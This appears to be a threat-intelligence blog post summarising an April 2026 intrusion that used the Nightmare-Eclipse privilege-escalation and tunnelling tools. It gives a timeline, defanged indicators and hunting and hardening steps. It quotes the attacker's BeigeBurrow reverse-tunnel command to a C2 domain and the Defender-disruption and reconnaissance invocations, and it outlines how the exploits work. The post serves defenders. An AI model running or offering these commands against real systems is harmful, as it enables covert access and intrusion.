Nightmare-Eclipse: Public PoC Meets Real Intrusion

Nightmare-Eclipse toolkit illustration covering BlueHammer, RedSun, UnDefend and the BeigeBurrow reverse tunnel agent

On April 20, 2026, Huntress published an incident report describing a real intrusion in which a threat actor tried to weaponise a set of public proof-of-concept tools collectively known as Nightmare-Eclipse. The pattern is the one we keep seeing: a researcher releases PoC code for an unpatched local privilege escalation, and within days someone drops it onto a live endpoint.

The good news in this case: of the four tools dropped on the target, three failed. Windows Defender quarantined the BlueHammer binary, RedSun never produced a result, and the UnDefend variants were operated incorrectly. Only the BeigeBurrow reverse-tunnel agent actually connected outbound. This post summarises the intrusion, lists every indicator of compromise Huntress published, and gives you a short hunt-and-harden checklist you can act on today.

What happened

The intrusion spanned roughly a week of activity on a single victim environment. Huntress reconstructed the timeline from EDR telemetry, FortiGate SSL VPN logs, and Defender alerts.

When	What Huntress observed
April 10	`FunnyApp.exe` (a BlueHammer variant) executed from the user’s Pictures folder. Defender quarantined it as `Exploit:Win32/DfndrPEBluHmr.BZ`.
April 15, 13:44 UTC	SSL VPN logon to the victim’s FortiGate using compromised credentials, sourced from `78.29.48[.]29` (Russia).
April 16	`RedSun.exe` executed from Downloads. Multiple UnDefend binaries (`undef.exe`, renamed `z.exe`) run from two different subfolders with and without the `-aggressive` flag.
April 16	Hands-on-keyboard reconnaissance: `whoami /priv`, `cmdkey /list`, `net group`. One `whoami /priv` spawned from `M365Copilot.exe`, suggesting the operator pivoted through a hijacked Copilot process.
Follow-on	Additional VPN sessions from `212.232.23[.]69` (Singapore) and `179.43.140[.]214` (Switzerland), same account, within a short window.
BeigeBurrow	`agent.exe -server staybud.dpdns[.]org:443 -hide` established an outbound Yamux tunnel to the attacker’s C2.

Three of the four tools failed to deliver their intended outcome. Huntress specifically called out that “the adversary clearly did not read nor understand the mechanism of action for UnDefend,” which is a nice reminder that opportunistic actors often run PoCs straight from a README without checking whether the prerequisites match the target.

The toolkit

Nightmare-Eclipse is not a single piece of malware. It is a cluster of four separate tools originally released as public proof-of-concept code, each solving a different step in a Windows intrusion.

BlueHammer (CVE-2026-33825)

BlueHammer is a local privilege escalation exploit that targets a time-of-check to time-of-use race in Windows Defender. In the original PoC it is used to extract the SAM database by briefly pausing Defender and winning the race against its scanner. Microsoft issued CVE-2026-33825 and shipped the fix in the April 2026 cumulative update.

MSRC advisory page for CVE-2026-33825, the Windows Defender TOCTOU vulnerability exploited by BlueHammer — Screenshot from Microsoft Security Response Center advisory for CVE-2026-33825

In this intrusion the BlueHammer binary was named FunnyApp.exe and dropped to the user’s Pictures folder. Defender caught it on execution and flagged it as Exploit:Win32/DfndrPEBluHmr.BZ. If you are patched, you are not vulnerable to the race, and Defender’s own signatures will detect the known public build on top of that.

RedSun

RedSun is a second privilege escalation that abuses directory junctions and the Windows Storage Tiers Management service to write arbitrary files into protected locations such as System32. There is no CVE assigned and no public patch at the time of the Huntress report. In this intrusion it was dropped as RedSun.exe in the user’s Downloads folder and run directly. Huntress did not observe a successful exploitation outcome on the target.

UnDefend

UnDefend is a Defender disruption tool rather than an exploit. It uses directory change notifications and file locks (oplocks) to hold Defender’s signature files open, preventing the product from loading or updating definitions. The operator tried both a bare execution and an aggressive-mode execution:

C:\Users\<username>\Downloads\ks\undef.exe
C:\Users\<username>\Downloads\kk\undef.exe -aggressive
C:\Users\<username>\Downloads\ks\z.exe (the same tool, renamed)

Note that the operator used two different subfolders (ks and kk) and the correctly spelled -aggressive flag. Huntress notes none of these invocations actually disrupted the target’s Defender.

BeigeBurrow

BeigeBurrow is the only tool in the set that ran successfully. It is a Go-compiled Windows binary that uses HashiCorp’s Yamux multiplexing library to build a covert, bidirectional TCP relay from the compromised host to an attacker-controlled server. Flags observed include -server, -hide, and -chain. The agent reconnects every five minutes if the tunnel drops.

In this intrusion the command line was:

agent.exe -server staybud.dpdns[.]org:443 -hide

The SHA-256 of the observed agent.exe sample is a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c. Huntress’s assessment is that BeigeBurrow “exists for one purpose: to give an operator a covert, multi-channel TCP relay into a compromised network.” The Huntress team also noted they cannot yet tell whether BeigeBurrow is being sold, shared between a loose group, or used uniquely by a single actor.

Attack chain

The end-to-end chain is straightforward once the VPN credentials are in the attacker’s hands.

graph TD
  A["Stolen VPN credentials<br/><small>FortiGate SSL VPN account</small>"] --> B["VPN logon from 78.29.48[.]29<br/><small>Russia, April 15 13:44 UTC</small>"]
  B --> C["Endpoint access<br/><small>Hands-on-keyboard recon</small>"]
  C --> D["LPE attempts<br/><small>BlueHammer, RedSun, UnDefend</small>"]
  D --> E["All three LPEs fail<br/><small>Defender quarantine + operator error</small>"]
  C --> F["BeigeBurrow agent.exe<br/><small>-server staybud.dpdns[.]org:443 -hide</small>"]
  F --> G["Yamux tunnel to C2<br/><small>Reconnects every 5 minutes</small>"]
  C --> H["Follow-on VPN logons<br/><small>212.232.23[.]69 SG, 179.43.140[.]214 CH</small>"]
  style A fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style B fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style C fill:#92400e,stroke:#78350f,color:#fef3c7
  style D fill:#92400e,stroke:#78350f,color:#fef3c7
  style E fill:#166534,stroke:#14532d,color:#dcfce7
  style F fill:#991b1b,stroke:#7f1d1d,color:#fef2f2
  style G fill:#5b21b6,stroke:#4c1d95,color:#ede9fe
  style H fill:#5b21b6,stroke:#4c1d95,color:#ede9fe

The only control that genuinely worked was Defender’s signature-based detection of the public BlueHammer PoC. Every other defensive outcome in this case depended on the operator making a mistake. That is not a defensive posture, that is luck.

Indicators of Compromise

All values below are reproduced exactly as published by Huntress, including their defang style ([.] for IP and domain dots).

Network indicators

Type	Value	Notes
IP (Russia)	`78.29.48[.]29`	Initial SSL VPN logon, April 15
IP (Singapore)	`212.232.23[.]69`	Follow-on SSL VPN logon
IP (Switzerland)	`179.43.140[.]214`	Follow-on SSL VPN logon
Domain (C2)	`staybud.dpdns[.]org`	BeigeBurrow Yamux tunnel destination, port 443

Host indicators

Type	Value	Tool
SHA-256	`a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c`	BeigeBurrow `agent.exe`
Defender signature	`Exploit:Win32/DfndrPEBluHmr.BZ`	BlueHammer
File path	`C:\Users\<username>\Pictures\FunnyApp.exe`	BlueHammer
File path	`C:\Users\<username>\Downloads\RedSun.exe`	RedSun
File path	`C:\Users\<username>\Downloads\ks\undef.exe`	UnDefend
File path	`C:\Users\<username>\Downloads\kk\undef.exe -aggressive`	UnDefend (aggressive mode)
File path	`C:\Users\<username>\Downloads\ks\z.exe`	UnDefend (renamed binary)
Command line	`agent.exe -server staybud.dpdns[.]org:443 -hide`	BeigeBurrow

What to hunt for

There are three things worth doing today, in order.

Patch and confirm Defender is current

Verify the April 2026 cumulative update is applied on every Windows endpoint. The MSRC advisory for CVE-2026-33825 is the authoritative reference for affected builds and patched versions.
Check Defender platform and engine versions on the fleet. Out-of-date Defender installs may not carry the Exploit:Win32/DfndrPEBluHmr.BZ signature.
For any endpoint that lags on either, prioritise remediation before moving on to hunting. A patched endpoint makes BlueHammer a non-issue.

Hunt the IOCs

Run EDR queries for the SHA-256 a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c across the fleet.
Search process telemetry for file names FunnyApp.exe, RedSun.exe, undef.exe, z.exe, and any agent.exe running with -server and -hide flags.
Search DNS and proxy logs for resolutions or connections to staybud.dpdns[.]org, and outbound TCP 443 sessions to that host.
Search Defender alert history for the Exploit:Win32/DfndrPEBluHmr.BZ detection.
Search FortiGate SSL VPN logs for successful authentications from 78.29.48[.]29, 212.232.23[.]69, or 179.43.140[.]214. Also flag any account that authenticated from more than one country within a short window, regardless of IP.
Look for unusual parent-child process relationships around whoami /priv, cmdkey /list, and net group, in particular anything spawned by M365Copilot.exe.

Harden the VPN

Enforce MFA on FortiGate SSL VPN for every account. If you cannot enforce it centrally, disable accounts that refuse to enrol.
Rotate credentials for any account that authenticated from the three listed IPs, or from any unusual geography in the last 30 days.
Review FortiGate logon audit and admin-action logs for configuration changes made during the incident window, including any new local users or modified firewall policies.
If you already use a managed EDR product, confirm that BeigeBurrow-style outbound tunnels on port 443 to dynamic DNS providers (.dpdns.org in this case) generate an alert. If they do not, add a detection for Go-compiled binaries making long-lived outbound connections from user-writable directories.

Why this matters for MSPs

The Nightmare-Eclipse cluster is a useful example of what we are going to see more of, not less of, over the coming year.

Public PoCs get weaponised in days. The BlueHammer, RedSun, and UnDefend PoCs were released in April 2026 and observed in a live intrusion within the same month. Any time a high-impact Windows LPE drops publicly, plan for weaponisation on a scale of days, not quarters.

Opportunistic operators are a real threat model. The actor in this case ran tools they clearly did not fully understand. That does not mean you can relax, it means the floor of capability required to try an intrusion is now very low. Decent detections and patching catch most of it, missing either is what gets exploited.

Covert tunnels are the only tool they actually need. BeigeBurrow was the one thing that worked. Small Go binaries talking Yamux over 443 to a dynamic DNS host are not exotic, they are table stakes for modern intrusions. If your EDR does not alert on this class of behaviour, that is the gap to close.

VPN credential theft remains the front door. The entire intrusion hinges on one stolen FortiGate SSL VPN credential. Enforcing MFA on every VPN account is a boring recommendation, and it is also the single control that would have prevented the chain from starting.

Huntress 2026 Cyber Threat Report: Key Findings for MSPs

Analysis of the Huntress 2026 Cyber Threat Report covering identity compromise, RMM abuse, ClickFix loaders, ransomware timelines, and a 30-day action plan.

Huntress Blocks Device Code Phishing from Railway

Huntress deployed a conditional access policy across ITDR-protected tenants to block device code phishing from Railway infrastructure using AI-generated lures.